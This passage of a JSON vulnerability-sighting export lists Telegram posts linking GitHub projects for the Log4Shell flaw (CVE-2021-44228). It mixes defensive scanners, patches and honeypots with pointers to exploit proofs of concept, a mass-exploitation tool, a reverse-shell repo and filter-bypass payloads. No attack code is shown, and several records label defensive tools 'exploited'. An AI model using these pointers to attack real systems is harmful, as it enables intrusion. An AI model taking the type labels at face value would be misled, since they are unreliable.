"#CVE-2021\n#Log4j\n#Log4Shell \nLog4j - Multitool. Find &amp; fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment\n\nhttps://github.com/suuhm/log4shell4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T01:01:24.000000Z"}, {"uuid": "66134ffe-7e6a-4543-97e8-d5b3c04c53d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1580", "content": "#exploit\n#log4Shell \n\nExploiting CVE-2021-44228 using PDFs as delivery channel\nhttps://github.com/eelyvy/log4jshell-pdf\n\n@BlueRedTeam", "creation_timestamp": "2021-12-31T08:21:33.000000Z"}, {"uuid": "6b14ed30-0752-4c50-813c-ce5a734777f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1347", "content": "#CVE-2021\nPoc of log4j2 (CVE-2021-44228)\n\nhttps://github.com/Crane-Mocker/log4j-poc\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T12:39:32.000000Z"}, {"uuid": "43c9473d-ac87-49d7-8466-596da71765a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1348", "content": "#CVE-2021\n#Log4j\nPython script that sends CVE-2021-44228 log4j payload requests to url list\n\nhttps://github.com/ssl/scan4log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T14:47:58.000000Z"}, {"uuid": "57fe632d-b214-451d-8c46-2eaed6d483d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1349", "content": "#CVE-2021\n#Log4shell\nMitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script\n\nhttps://github.com/infiniroot/nginx-mitigate-log4shell\n\n@BlackBoxOsint", "creation_timestamp": "2021-12-12T14:48:33.000000Z"}, {"uuid": "b3032973-8c64-4748-bc66-f5a4b6c41499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1452", "content": "#CVE-2021\n#Log4J\nCVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists.\n\nhttps://github.com/razz0r/CVE-2021-44228-Mass-RCE\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T02:43:01.000000Z"}, {"uuid": "c9243274-48a3-4485-b6fe-24615291e6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1595", "content": "#Blue_Team\n\nBackdoor detection for VMware view post Log4j exploitation (CVE-2021-44228)\nhttps://github.com/mr-r3b00t/CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2022-01-06T06:14:51.000000Z"}, {"uuid": "289403db-afdc-4926-ade2-59354d031ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1638", "content": "#CVE-2021\n\nApache log4j2 CVE-20210-44228 poc\n\nhttps://github.com/c4dr01d/CVE-2021-44228-poc\n\n@BlueRedTeam", "creation_timestamp": "2022-01-18T16:14:15.000000Z"}, {"uuid": "8854914e-68ee-4a98-902d-f4a30db7e7aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1925", "content": "#tools\nLogMePwn is a fully automated, multi-protocol, reliable, super-fast scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability\nhttps://github.com/0xInfection/LogMePwn\n\n@BlueRedTeam", "creation_timestamp": "2022-04-13T16:49:55.000000Z"}, {"uuid": "668ef012-14cb-412b-b93b-32fe24b43362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1477", "content": "#CVE-2021\n#Log4j \nLog4j2 CVE-2021-44228 revshell\n\nhttps://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T20:45:56.000000Z"}, {"uuid": "7b211998-28b2-4135-9465-dd67a80e94bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1523", "content": "#CVE-2021\n#Log4Shell \nJava application vulnerable to the CVE-2021-44228 (a.k.a log4shell) vulnerability\n\nhttps://github.com/GroupePSA/log4shell-honeypot\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T12:03:01.000000Z"}, {"uuid": "241815d2-d3c2-4b6a-bc4c-3442f139ec2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1311", "content": "#CVE 2021\n#Log4j \n#exploit \n\n\ud83d\udc31\u200d\ud83d\udcbb \u2702\ufe0f \ud83e\udd2c CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches\n\nhttps://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T11:34:18.000000Z"}, {"uuid": "0af2c7ba-e912-4ea8-9877-31ebdc5d9da4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1312", "content": "#CVE 2021\n#Log4shell\nLog4Shell CVE-2021-44228 mitigation tester\n\nhttps://github.com/lhotari/log4shell-mitigation-tester\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T11:32:37.000000Z"}, {"uuid": "dd646f22-5c8b-4aa4-8741-61948f3e7c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1313", "content": "#CVE-2021\n#Log4j \n\nA Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads\n\nhttps://github.com/toramanemre/log4j-rce-detect-waf-bypass\n\n@BlueRedTeam", "creation_timestamp": "2022-11-14T13:34:03.000000Z"}, {"uuid": "c42bda77-7125-493a-a26a-be51f55e5059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1314", "content": "#CVE 2021\n#Log4j\n#Log4j2\nVulnerability scanner for Log4j2 CVE-2021-44228\n\nhttps://github.com/logpresso/CVE-2021-44228-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2022-11-14T13:34:05.000000Z"}, {"uuid": "ff7b7499-7fe6-4e38-9737-8de97dc99d8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1316", "content": "#CVE 2021\n\nTest the CVE\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\n\nhttps://github.com/gauthamg/log4j2021_vul_test\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T13:35:01.000000Z"}, {"uuid": "eb52af52-df5a-4fa7-862a-2d4e325bb269", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1317", "content": "#CVE-2021\nScan your logs for CVE-2021-44228 related activity and report the attackers\n\nhttps://github.com/js-on/jndiRep\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T13:39:00.000000Z"}, {"uuid": "30ac78b8-399b-415e-8d98-46c7a099e180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1318", "content": "#CVE-2021\n#Log4j\n\nLog4j-RCE (CVE-2021-44228) Proof of Concept\n\nhttps://github.com/PwnC00re/Log4J_0day_RCE\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T15:00:03.000000Z"}, {"uuid": "2f3c572b-ef75-461c-b1d4-5027d71aa448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1319", "content": "#CVE-2021\n\nA Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228\n\nhttps://github.com/Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T15:00:33.000000Z"}, {"uuid": "b4a6d5b8-9b65-4a12-b29f-ec74ed8de670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1320", "content": "#CVE-2021\n\nproof of concept for CVE-2021-44228\n\nhttps://github.com/trevalkov/javalogslulz\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T15:42:50.000000Z"}, {"uuid": "f9a96df9-7867-46c6-82ac-482fd5776339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1321", "content": "#CVE-2021\n#Log4j \n\nContent to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228\n\nhttps://github.com/cado-security/log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T16:47:14.000000Z"}, {"uuid": "ec41f1cc-cc1e-4eb4-91db-04215cf86f04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1322", "content": "#CVE-2021\n#Log4j \nSimple Python 3 script to detect the Java library \\\"Log4j\\\" vulnerability (CVE-2021-44228) for a list of URLs\n\nhttps://github.com/takito1812/log4j-detect\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T16:47:56.000000Z"}, {"uuid": "f40cdf53-379f-4f7d-9608-c501ded30648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1323", "content": "#CVE-2021\nSimple demo of CVE-2021-44228\n\nhttps://github.com/datadavev/test-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T16:48:26.000000Z"}, {"uuid": "3271a15d-8871-4c7b-8f29-f253c6c9c4fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1324", "content": "#CVE-2021\nCVE-2021-44228\n\nhttps://github.com/zzzz0317/log4j2-vulnerable-spring-app\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T17:27:51.000000Z"}, {"uuid": "1f713166-433b-42f9-b0e0-b894f5126cf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1308", "content": "#CVE 2021\n#LOG4J \n\nFixes CVE-2021-44228 in log4j by patching JndiLookup class\n\nhttps://github.com/saharNooby/log4j-vulnerability-patcher-agent\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T11:35:06.000000Z"}, {"uuid": "8acbd42f-4bce-411a-9c14-bbdc5834cd33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1329", "content": "#CVE-2021\n#Log4Shell\nSpring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.\n\nhttps://github.com/christophetd/log4shell-vulnerable-app\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T02:02:57.000000Z"}, {"uuid": "7db74f48-7837-4546-bc37-6ca1b63b0a87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1330", "content": "#CVE-2021\n\nThis enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device\n\nhttps://github.com/irgoncalves/f5-waf-enforce-sigs-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T02:03:49.000000Z"}, {"uuid": "3c565b94-6ce4-4c57-a526-67f39ae50c15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1331", "content": "#CVE-2021\n\nThis enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device\n\nhttps://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T02:04:35.000000Z"}, {"uuid": "d24d1275-fc8b-4372-8c46-254e4e161e80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1332", "content": "#CVE-2021\n\ndocker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228\n\nhttps://github.com/jeffbryner/log4j-docker-vaccine\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T02:05:19.000000Z"}, {"uuid": "b09f28d7-f7df-4db5-aa11-61d7209aa58e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1333", "content": "#CVE-2021\n#Log4j2\nApache Log4j2 CVE-2021-44228 RCE\n\nhttps://github.com/mzlogin/CVE-2021-44228-Demo\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T06:30:55.000000Z"}, {"uuid": "4b2f6d80-dda6-408b-aa3d-71c57b7e3f6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1334", "content": "#CVE-2021\n#Log4j\nScript to patch VMware vCenter log4j vulnerability CVE-2021-44228\n\nhttps://github.com/blake-fm/vcenter-log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T06:31:45.000000Z"}, {"uuid": "95a3f434-952c-4d14-8b5e-bba2f562d8b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1401", "content": "#CVE-2021\n#Log4j \n\nPublic IOCs about log4j CVE-2021-44228\n\nhttps://github.com/threatmonit/Log4j-IOCs\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T22:58:44.000000Z"}, {"uuid": "235795e1-6e63-4692-94e6-c7bde6e4cb3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/BlueRedTeam/1402", "content": "#CVE-2021\n\nCompiling links of value i find regarding CVE-2021-44228\n\nhttps://github.com/ben-smash/l4j-info\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:13:02.000000Z"}, {"uuid": "6237011b-90b3-4c0a-a595-05774e33297d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1403", "content": "#CVE-2021\n#Log4Shell \nPython3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.\n\nhttps://github.com/lfama/log4j_checker\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:16:43.000000Z"}, {"uuid": "e74b1ed0-5758-4313-bd89-2844fd6ecca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1404", "content": "#CVE-2021\n#log4j \nDemonstration of CVE-2021-44228 with a possible strategic fix.\n\nhttps://github.com/strawhatasif/log4j-test\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:19:32.000000Z"}, {"uuid": "d41cdfb9-713f-4332-85f5-5cee0e678e6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1405", "content": "#CVE-2021\n#Log4Shell \nNmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)\n\nhttps://github.com/giterlizzi/nmap-log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:23:15.000000Z"}, {"uuid": "98411b6e-edee-47b6-b878-96fcc5691d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1406", "content": "#CVE-2021\n#log4j\n#log4Shell \nA micro lab for CVE-2021-44228 (log4j)\n\nhttps://github.com/tasooshi/horrors-log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:26:12.000000Z"}, {"uuid": "e4e4d7bf-5ccc-497e-900d-d09091d021d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1407", "content": "#CVE-2021\n#log4j \n\nCVE-2021-44228 - Apache log4j RCE quick test\n\nhttps://github.com/jeffli1024/log4j-rce-test\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:30:01.000000Z"}, {"uuid": "15de947e-481c-423a-8bf8-ea16f792afd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1408", "content": "#CVE-2021\nGitHub CodeQL Action to scan for CVE-2021\u201344228\n\nhttps://github.com/benarculus/cve-2021-44228-code-scan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:33:01.000000Z"}, {"uuid": "0a17c71b-1f07-4968-bea6-42fd7612a6ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1409", "content": "#CVE-2021\n#log4j \n\nLog4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS\n\nhttps://github.com/name/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T23:36:01.000000Z"}, {"uuid": "c29c6977-6152-4e9c-ba6c-d87bfe00aaae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1437", "content": "#CVE-2021\n#Log4Shell \nDetails : CVE-2021-44228\n\nhttps://github.com/34zY/JNDI-Exploit-1.2-log4shell-\n@BlueRedTeam", "creation_timestamp": "2021-12-14T13:13:00.000000Z"}, {"uuid": "ac09a510-b143-4834-b016-b191a7358a4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1420", "content": "#CVE-2021\n#log4j \nSome siimple checks to see if JAR file is vulnerable to CVE-2021-44228\n\nhttps://github.com/gcmurphy/chk_log4j\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:45:12.000000Z"}, {"uuid": "d4a74d24-11eb-4b9d-bc9f-5bc262d85426", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1421", "content": "#CVE-2021\n#Log4j \nA Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228\n\nhttps://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:48:27.000000Z"}, {"uuid": "49b48df6-5840-4eaa-91c0-67e5ee4f88a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1423", "content": "#CVE-2021\n#log4j \nCheck CVE-2021-44228 vulnerability\n\nhttps://github.com/codiobert/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T09:54:01.000000Z"}, {"uuid": "40d68a44-5e85-46a3-a602-20e8301d8663", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1428", "content": "#CVE-2021\n#log4j \nEndpoint to test CVE-2021-44228 \u2013 Log4j 2\n\nhttps://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T10:10:50.000000Z"}, {"uuid": "98d9024a-9626-4c83-a910-bc7db37e1668", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1430", "content": "#CVE-2021\n#log4j2 \nLittle recap of the log4j2 remote code execution (CVE-2021-44228)\n\nhttps://github.com/jan-muhammad-zaidi/Log4j-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T10:38:41.000000Z"}, {"uuid": "745d9649-09b3-4207-ae33-3bb74fb5d3ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1480", "content": "#CVE-2021\n#Log4Shell \n#honeypot\nDockerized honeypot for CVE-2021-44228.\n\nhttps://github.com/michaelsanford/Log4Shell-Honeypot\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T22:27:51.000000Z"}, {"uuid": "532cb4da-a0fc-4333-900d-767af1be3866", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1350", "content": "#Log4j \n#CVE-2021\n\nPublic IoCs about log4j CVE-2021-44228\n\nhttps://github.com/authomize/log4j-log4shell-affected\n\n@BlueRedTeam", "creation_timestamp": "2021-12-12T15:57:35.000000Z"}, {"uuid": "f4dae205-ad7e-44ed-a300-a51d7e574288", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1374", "content": "#CVE-2021\n#Log4j \nLog4J CVE-2021-44228 : Mitigation for different environments \n\nhttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T11:13:55.000000Z"}, {"uuid": "159dd8d7-bd1f-4530-8d50-7c26e11bebf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1375", "content": "#CVE-2021\n#Log4j \nCVE-2021-44228 log4j mitigation using aws wafv2 with ansible\n\nhttps://github.com/markuman/aws-log4j-mitigations\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T11:38:01.000000Z"}, {"uuid": "140bcbae-6537-4863-b469-65aa12c51ce2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1376", "content": "#Log4j \n#CVE-2021\n\nLog4J CVE-2021-44228 : Mitigation Cheat Sheet\n\nhttps://github.com!/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T11:55:02.000000Z"}, {"uuid": "e5c7cee2-3ccc-4d69-9795-b05ca8a313cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1377", "content": "#CVE-2021\n#log4j \nA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 \n\nhttps://github.com/fullhunt/log4j-scan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T12:30:16.000000Z"}, {"uuid": "a3f3fbd4-4ec1-4171-a3da-e785771ceb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1379", "content": "#CVE-2021\n#Log4j\nA lab for playing around with the Log4J CVE-2021-44228\n\nhttps://github.com/tuyenee/Log4shell\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T13:30:22.000000Z"}, {"uuid": "f070261c-5fb1-4e74-8e2b-96daf6628ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1380", "content": "#CVE-2021\n\nSimple tool for scanning entire directories for attempts of CVE-2021-44228\n\nhttps://github.com/kek-Sec/log4j-scanner-CVE-2021-44228\n\n@BlueRedTeam", "creation_timestamp": "2021-12-13T14:02:01.000000Z"}, {"uuid": "927f4569-01cd-450b-884f-14e7ee416123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/BlueRedTeam/1431", "content": "#CVE-2021\n#Log4j2\nLittle recap of the log4j2 remote code execution (CVE-2021-44228)\n\nhttps://github.com/cbuschka/log4j2-rce-recap\n\n@BlueRedTeam", "creation_timestamp": "2021-12-14T10:44:16.000000Z"}, {"uuid": 